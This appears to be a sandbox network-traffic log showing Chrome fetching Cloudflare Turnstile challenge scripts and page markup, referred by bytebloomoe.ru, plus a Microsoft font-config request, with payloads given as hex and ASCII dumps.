                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.649725104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:33 UTC542OUTGET /turnstile/v0/api.js HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:33 UTC386INHTTP/1.1 302 Found
                            Date: Tue, 13 Aug 2024 19:57:33 GMT
                            Content-Length: 0
                            Connection: close
                            access-control-allow-origin: *
                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                            cross-origin-resource-policy: cross-origin
                            location: /turnstile/v0/b/cc21665cd7b9/api.js
                            Server: cloudflare
                            CF-RAY: 8b2b465ca92442af-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.649726104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:34 UTC557OUTGET /turnstile/v0/b/cc21665cd7b9/api.js HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:34 UTC471INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:34 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 45035
                            Connection: close
                            accept-ranges: bytes
                            last-modified: Fri, 09 Aug 2024 15:21:28 GMT
                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                            access-control-allow-origin: *
                            cross-origin-resource-policy: cross-origin
                            Server: cloudflare
                            CF-RAY: 8b2b4663290772b1-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:34 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                            Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                            2024-08-13 19:57:34 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                            Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                            2024-08-13 19:57:34 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                            Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                            2024-08-13 19:57:34 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                            2024-08-13 19:57:34 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                            Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                            2024-08-13 19:57:34 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                            Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                            2024-08-13 19:57:34 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                            Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                            2024-08-13 19:57:34 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                            Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                            2024-08-13 19:57:34 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                            Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                            2024-08-13 19:57:34 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                            Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.649727184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                            Range: bytes=0-2147483646
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-08-13 19:57:35 UTC515INHTTP/1.1 200 OK
                            ApiVersion: Distribute 1.1
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF06)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-weu-z1
                            Cache-Control: public, max-age=247629
                            Date: Tue, 13 Aug 2024 19:57:34 GMT
                            Content-Length: 55
                            Connection: close
                            X-CID: 2
                            2024-08-13 19:57:35 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.649728104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:35 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/ HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: iframe
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:35 UTC1362INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 74663
                            Connection: close
                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            origin-agent-cluster: ?1
                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                            cross-origin-resource-policy: cross-origin
                            cross-origin-opener-policy: same-origin
                            referrer-policy: same-origin
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                            document-policy: js-profiling
                            cross-origin-embedder-policy: require-corp
                            2024-08-13 19:57:35 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 32 62 34 36 36 61 34 38 63 33 34 34 30 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                            Data Ascii: Server: cloudflareCF-RAY: 8b2b466a48c34405-EWRalt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:35 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                            2024-08-13 19:57:35 UTC1369INData Raw: 28 31 2e 35 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 32 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 72 65 77 6f 72 6b 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 20 20 33 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 2d 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 7d 0a 40
                            Data Ascii: (1.5); opacity: 1; } 100% { transform: scale(2); opacity: 0; }}@keyframes firework { 0% { opacity: 0; stroke-dashoffset: 8; /* length */ } 30% { opacity: 1; } 100% { stroke-dashoffset: -8; /* length */ }}@
                            2024-08-13 19:57:35 UTC1369INData Raw: 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 36 70 78 20 30 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 0a 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0a 7d 0a 0a 23 66 61 69 6c 2d 69 63 6f 6e 2c 20 23 6f 76 65 72 72 75 6e 2d 69 63 6f 6e 20 7b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                            Data Ascii: ex; flex-direction: column; margin: 0 16px 0 0; text-align: right;}#spinner-icon { display: flex; width: 30px; height: 30px; animation: spin 5s linear infinite;}#fail-icon, #overrun-icon { width: 30px; height: 30px; display: flex
                            2024-08-13 19:57:35 UTC1369INData Raw: 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 6f
                            Data Ascii: terlimit: 10; stroke: #038127; fill: #038127;}#overrun-text,#timeout-text,#expired-text { margin: 0; text-align: inherit; font-size: 14px; font-weight: 400;}#timeout-refresh-link,#expired-text,#timeout-text,#expired-refresh-link,#o
